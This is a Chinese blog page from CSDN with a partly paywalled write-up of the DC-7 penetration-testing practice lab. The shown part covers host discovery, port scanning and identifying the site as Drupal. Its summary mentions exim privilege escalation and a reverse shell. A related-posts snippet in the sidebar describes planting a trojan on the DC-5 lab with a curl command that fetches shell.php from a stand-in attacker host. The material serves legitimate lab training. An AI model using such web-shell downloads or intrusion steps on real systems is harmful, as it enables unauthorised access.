DC系列漏洞靶场-渗透测试学习复现(DC-7)

最新推荐文章于 2024-05-30 21:35:27 发布
最新推荐文章于 2024-05-30 21:35:27 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: DC靶场渗透测试学习 文章标签: 数据库 python linux ssh 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W983079520/article/details/110958705
版权
本文详细记录了对DC-7漏洞靶场的渗透测试过程,包括环境搭建、主机发现、端口扫描、Web信息收集、用户密码破解、exim提权等步骤。最终通过exim漏洞获取root权限,读取flag。
摘要由CSDN通过智能技术生成

DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。

本篇文档中用到了exim4漏洞提权和shell二次反弹。

1 环境搭建

下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。

2 主机发现

使用Kali中的arp-scan工具扫描结果如下:

172.16.12.149为DC-7靶机的IP地址。

3 端口探测

探测使用nmap工具

端口扫描结果如下:

由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。

4 访问web

访问web界面如下:

从web首页的这段话来看渗透的路子在左边的那个搜索框上,随便输点什么查询下,都没有找到什么有用的信息,下面是这段话的翻译

DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的,但如果你需要使用暴力破解或字典攻击,你可能不会成功。(说明暴力破解登录用户或字典检索网站目录还是有可能操作的)

你要做的,就是跳出框框去思考。

在盒子外面。:-)

5 对网站信息收集

打开插件Wappalyzer进行网站指纹识别如下:

从指纹识别信息中提取出的信息有:

1 CMS(内容管理系统):Drupal

2 编程语言:PHP

3 Web服务器:Apache 2.4.25

4 操作系统:Debian

6 用户密码破解

玩这个网站最开始我想到的是

1 网站首页的搜索框,尝试直接查询passwd等文件或直接输入linux命令查看,都以失败收尾;

最低0.47元/天 解锁文章
^找猪的男孩^
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现DC-1)
W983079520的博客
11-01 2704
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC系列漏洞靶场-渗透测试学习复现DC-2)
W983079520的博客
11-03 1803
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC-5靶场
xhx836161547的博客
12-14 797
DC-5黑盒测试靶场
DC-1靶场渗透测试过程(个人学习
m0_59028058的博客
05-30 1676
DC-1靶场下载地址:攻击机kali的IP地址:192.168.37.129注意靶机和攻击机的环境配置要一致。
靶机10 DC-9(过程超详细)
honest_gg的博客
10-09 2945
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1740
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
渗透过程文章
06-21
非常不错的文章~有需要的可以看看.介绍了一些非常有意思的事情。整个过程比较曲折
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1582
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-7靶场
2301_76690905的博客
12-20 942
下载后解压会有一个DC-7.ova文件,直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式,然后即可开始渗透。按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,能搜索到其github账户,账户下有网站源码文件,里面有config配置文件信息。发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。
DC-7渗透笔记
现代鲁滨逊的博客
05-12 238
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
dc-7 靶机渗透学习
..
03-23 3915
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
DC渗透系列DC-4靶场
xydsg的博客
02-05 713
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限。存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell。转换用户,发现一个teehee用户可以使用root无密码权限。teehee可以通过修改该文件达到添加用户的效果,文件格式为。linux的邮件目录是/var/spool/mail。抓个包,发现ls -l命令是radio参数后的值。把里面的密码取出来存着先 命名为jim.txt。backups里面有老密码,mbox不够权限。我们可以使用keehee添加root权限用户。
DC7_靶场实战
JSH_CDX的博客
03-30 1361
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值